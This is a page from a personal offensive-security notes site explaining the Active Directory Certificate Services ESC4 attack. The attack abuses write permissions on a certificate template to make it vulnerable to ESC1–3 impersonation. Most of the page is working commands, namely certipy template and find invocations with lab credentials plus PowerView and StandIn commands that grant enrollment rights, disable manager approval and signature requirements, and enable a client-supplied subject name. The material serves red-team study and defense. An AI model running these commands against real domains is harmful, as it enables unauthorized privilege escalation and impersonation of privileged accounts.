🦦
Otter's Notes
  • Introduction
  • Articles
    • Dumping data from the Microsoft Recall folder
    • Gaining persistence on Windows with Time Providers
    • Reverse engineering LSASS to decrypt DPAPI keys
    • Intro to Hypervisor Implants
    • In-depth Windows Telemetry
  • Notes
    • Active Directory
      • Active Directory Structure
      • Active Directory Terminology
      • Active Directory Objects
      • Active Directory Groups
      • Active Directory Functionality
      • Active Directory Protocols
      • Active Directory Rights and Privileges
      • Security in Active Directory
      • Users and Machine Accounts
      • NTLM
      • LDAP
      • Making a Target User List
      • Enumerating & Retrieving Password Policies
      • Enumerating Security Controls
      • Examining Group Policy
      • GPOs
      • LAPS
      • LLMNR & NBT-NS Poisoning
      • LOLBIN Enumeration
    • AAD
      • Useful Links
      • Overview of Azure & M365
      • Enumerate Users and Domains
      • Post-exploitation Reconnaissance
      • OAuth 2.0 Abuse
      • Abusing Device Code Authentication
      • Abusing Cloud Administrator Role
      • Abusing User Administrator Role
      • AAD Federated Backdoor
      • Service Principal Abuse
      • Compromising Azure Blobs and Storage Accounts
      • Malicious Device Join
      • Disabling Auditing (Unified Audit Logs)
      • Spoofing Azure Sign-In Logs
      • Registering Fake Agents for Log Spoofing
      • Pass the PRT
      • Pass the Cookie
      • Abusing Managed Identities
      • Virtual Machine Abuse
      • Attacking Key Vaults
    • Forest Trust Abuse
      • Parent-Child Trust Abuse
      • One-Way Inbound Trust Abuse
      • Foreign Group Membership
      • Foreign ACL Principals
      • SID History
      • SID Filter Bypass
      • Intra-Forest Attacks
        • Configuration Naming Context Replication
        • ADCS NC Replication Attack
        • GPO On-Site Attack
        • GoldenGMSA Attack
        • DNS Trust Attack
      • Cross-Forest Attacks
        • Trust Account Attack
        • Abusing SQL Linked Servers
        • Abusing PAM Trusts
    • Kerberos
      • Overview of Kerberos Authentication
      • Silver Tickets
      • Golden Tickets
      • Diamond Tickets
      • Kerberoasting
      • AS-REPRoasting
      • Resource-Based Constrained Delegation
      • Constrained Delegation
      • Unconstrained Delegation
      • S4U2Self & S4U2Proxy
      • Golden Certificates
    • DACL Abuse
      • DACL Overview
      • DACLs Enumeration
      • AddMembers
      • GPO Attacks
      • Granting Rights and Ownership
      • Logon Scripts
      • NoPAC
      • Password Abuse
      • SPN Jacking
      • Shadow Credentials
      • Targeted Kerberoasting
    • ADCS
      • Introduction to ADCS
      • ESC1
      • ESC2
      • ESC3
      • ESC4
      • ESC5
      • ESC6
      • ESC7
      • ESC8
      • ESC9
      • ESC10
      • ESC11
      • Certificate Mapping
    • PowerShell
      • PowerShell Basics
      • PowerShell Remoting
      • Alternate PowerShell Hosts
      • PowerShell Pipeline Runners
      • PowerShell Code Signing
      • Scriptblock Logging
      • PowerShell CLM
      • AMSI
      • PowerShell Reflection
      • WMI - Windows Management Instrumentation
      • Interfacing with AD
      • PowerShell Snippets
        • Bypass application whitelisting and CLM with runscripthelper and WMI
        • Create fake PowerShell logs
        • Enumerate AD ACLs
        • Enumerate WMI events
        • Enumerate Domain Trusts
        • Enumerate change metadata
        • Enumerate non-signed service binaries
        • Enumerate with GPOs
        • Find signed alternate PowerShell hosts
        • Get AMSI module
        • Group processes by user with WMI
        • Hide processes from Get-Process
        • Malware re-purposing with PowerShell reflection
        • Monitor PowerShell hosts with WMI
        • PowerShell reflection offensive use-case
        • Query PowerShell alternative hosts with WMI
        • Retrieve file certificate
        • Search LDAP for misconfigurations
        • Sign custom code with PowerShell
        • WMI service creation
        • Weak folder permission enumeration
    • AWS
      • AWS Organizations
      • AWS Principals
    • Binary Exploitation
      • Environment setup for Browser Exploitation
      • Browser Overview and Components
    • Kernel Development
      • Windows
        • Configuring a VM for driver development
Powered by GitBook
On this page
  1. Notes
  2. ADCS

ESC4

Performing ESC4 allows an attacker to introduce a misconfiguration to a template that is not vulnerable to begin with by abusing a certificate with overly-permissive ACLs; some rights that are critical for this abuse are:

  • Owner - Full Control

  • FullControl - Full Control

  • WriteOwner - Modify Owner for grant Full Control

  • WriteDacl - Modify access control for grant Full Control

  • WriteProperty - Edit any properties

In order to modify a template we need to modify these values:

  • Grant Enrollment rights for the vulnerable template

  • Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval

  • Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement

  • Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN

  • Set the mspki-certificate-application-policy to a certificate purpose for authentication:

    • Client Authentication (OID: 1.3.6.1.5.5.7.3.2)

    • Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)

    • PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)

    • Any Purpose (OID: 2.5.29.37.0)

    • No Extended Key Usage (EKU)

These are the steps we can take to abuse a certificate template vulnerable to ESC4: first we make the changes to the certificates we have ACLs on and save the old configuration so that we can revert the changes at a later time

certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -save-old

now the ESC4 certificate should be vulnerable to all ESC techniques from 1 to 4 (included)

certipy find -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -vulnerable -stdout

<SNIP>

ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2  : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3  : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4  : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions

To revert the changes made to the certificate template we can use the JSON file generated with the previous certipy template command

certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -configuration ESC4.json

The certipy template command automates the process of setting up the misconfigurations completely but it's also possible to do it manually from a Windows host using the following commands and PowerView.

  1. Add Certificate Enrollment Permissions to the Domain Users group

Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=domain,DC=com" -Verbose
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose

  1. Disable Authorized Signature Requirement by setting the mspki-ra-signature attribute to 0

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose

  1. Adding PKI Extended Key Usage EKU and mspki-certificate-application-policy

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose

We can also do the same thing with StandIn, the following are the commands used to introduce a ESC1 misconfiguration into a certificate.

  • Adding ENROLLEE_SUPPLIES_SUBJECT

.\StandIn.exe --ADCS --filter SecureUpdate --ess --add

  • Add Certificate Enrollment Permissions to the Domain Users group

.\StandIn.exe --ADCS --filter SecureUpdate --ntaccount
"DOMAIN\domain users" --enroll --add

  • Adding an EKU (in this case we'll use the Client Authentication EKU):

.\StandIn.exe --ADCS --filter SecureUpdate --clientauth --add
PreviousESC3NextESC5

Last updated 1 year ago

From this point on we can abuse any of the 3 misconfigurations (either , or ).

Disable by setting the PEND_ALL_REQUESTS flag to 0x00000009 (0x00000001 + 0x00000008 for CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS and CT_FLAG_PUBLISH_TO_DS)

Enabling SAN Specification making the template vulnerable to by setting the flag to 1

ESC1
ESC2
ESC3
manager approval requirement
ESC1
ENROLLEE_SUPPLIES_SUBJECT